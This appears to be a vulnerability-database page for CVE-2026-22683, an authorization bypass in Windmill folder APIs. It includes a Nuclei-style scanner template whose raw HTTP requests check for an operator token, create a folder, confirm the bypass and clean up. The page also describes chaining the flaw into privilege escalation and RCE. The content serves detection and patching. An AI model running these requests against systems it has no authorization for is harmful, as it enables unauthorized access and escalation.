/Vulnerability Library

Windmill < 1.603.3 - Operator Authorization Bypass

CVE-2026-22683
Verified

Description

Windmill versions 1.276.0 through 1.603.2 contain an authorization bypass vulnerability in the folder management API endpoints. The endpoints for creating, deleting, and managing folder ownership do not enforce role-based access control for operator-level users. In Windmill, operators are restricted users intended to only execute existing scripts, but due to missing server-side authorization checks, operators can create folders, manage folder permissions, and access owner management endpoints. This bypass serves as the prerequisite for exploiting CVE-2026-23696 (SQL injection via folder addowner) enabling full privilege escalation from operator to super admin with remote code execution.

Severity

High

CVSS Score

8.1

Exploit Probability

3%

Affected Product

windmill

Published Date

July 21, 2026

Template Author

chocapikk, dhiyaneshdk

CVE-2026-22683.yaml
id: CVE-2026-22683

info:
  name: Windmill < 1.603.3 - Operator Authorization Bypass
  author: chocapikk,DhiyaneshDK
  severity: high
  description: |
    Windmill versions 1.276.0 through 1.603.2 contain an authorization bypass vulnerability in the folder management API endpoints. The endpoints for creating, deleting, and managing folder ownership do not enforce role-based access control for operator-level users. In Windmill, operators are restricted users intended to only execute existing scripts, but due to missing server-side authorization checks, operators can create folders, manage folder permissions, and access owner management endpoints. This bypass serves as the prerequisite for exploiting CVE-2026-23696 (SQL injection via folder addowner) enabling full privilege escalation from operator to super admin with remote code execution.
  impact: |
    An attacker with operator-level credentials can bypass role restrictions to create and manage folders. When chained with CVE-2026-23696 (SQL injection in folder addowner), this enables extraction of the JWT signing secret, forging of admin tokens, and escalation to super admin with arbitrary code execution on the server.
  remediation: |
    Update Windmill to version 1.603.3 or later which properly enforces operator role restrictions on folder management and job execution endpoints.
  reference:
    - https://github.com/Chocapikk/Windfall
    - https://github.com/windmill-labs/windmill/commit/942fb629210ebb287f48467d1535ffde3a3eeafe
    - https://chocapikk.com/posts/2026/windfall-nextcloud-flow-windmill-rce/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-22683
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 8.1
    cve-id: CVE-2026-22683
    epss-score: 0.02609
    epss-percentile: 0.84171
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 5
    vendor: windmill-labs
    product: windmill
  tags: cve,cve2026,windmill,operator,privesc,authenticated

variables:
  folder: "{{to_lower(rand_text_alpha(8))}}"

flow: |
  http("list-workspaces") && http("check-role") && http("create-folder") && http("verify-bypass") && http("cleanup")

http:
  - id: list-workspaces
    raw:
      - |
        GET /api/workspaces/list HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Content-Type: application/json

    matchers:
      - type: word
        words:
          - '"id"'
        internal: true

    extractors:
      - type: regex
        name: workspace
        part: body
        group: 1
        regex:
          - '"id"\s*:\s*"([^"]+)"'
        internal: true

  - id: check-role
    raw:
      - |
        GET /api/w/{{workspace}}/users/whoami HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Content-Type: application/json

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, '\"operator\":true','\"is_admin\":false')"
        internal: true

  - id: create-folder
    raw:
      - |
        POST /api/w/{{workspace}}/folders/create HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Content-Type: application/json

        {"name":"{{folder}}"}

    matchers:
      - type: word
        words:
          - "Created folder"
        internal: true

  - id: verify-bypass
    raw:
      - |
        GET /api/w/{{workspace}}/folders/get/{{folder}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Content-Type: application/json

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"owners"'
          - '"extra_perms"'
        condition: and

      - type: status
        status:
          - 200

  - id: cleanup
    raw:
      - |
        DELETE /api/w/{{workspace}}/folders/delete/{{folder}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Content-Type: application/json

    matchers:
      - type: status
        status:
          - 200
        internal: true
# digest: 4a0a00473045022100b2e4d72c4370f6299f94e92b9e5c95f334c645b43c841988c68af3387a8f431c02201c433d95e6a19bda73df2d1c83f32bf56e07412b8304ff9374905618d10602a7:922c64590222798bb761d5b6d8e72950
8.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
CVE ID:
cve-2026-22683
CWE ID:
cwe-862

References

https://github.com/Chocapikk/Windfallhttps://github.com/windmill-labs/windmill/commit/942fb629210ebb287f48467d1535ffde3a3eeafehttps://chocapikk.com/posts/2026/windfall-nextcloud-flow-windmill-rce/https://nvd.nist.gov/vuln/detail/CVE-2026-22683

Remediation Steps

Update Windmill to version 1.603.3 or later which properly enforces operator role restrictions on folder management and job execution endpoints.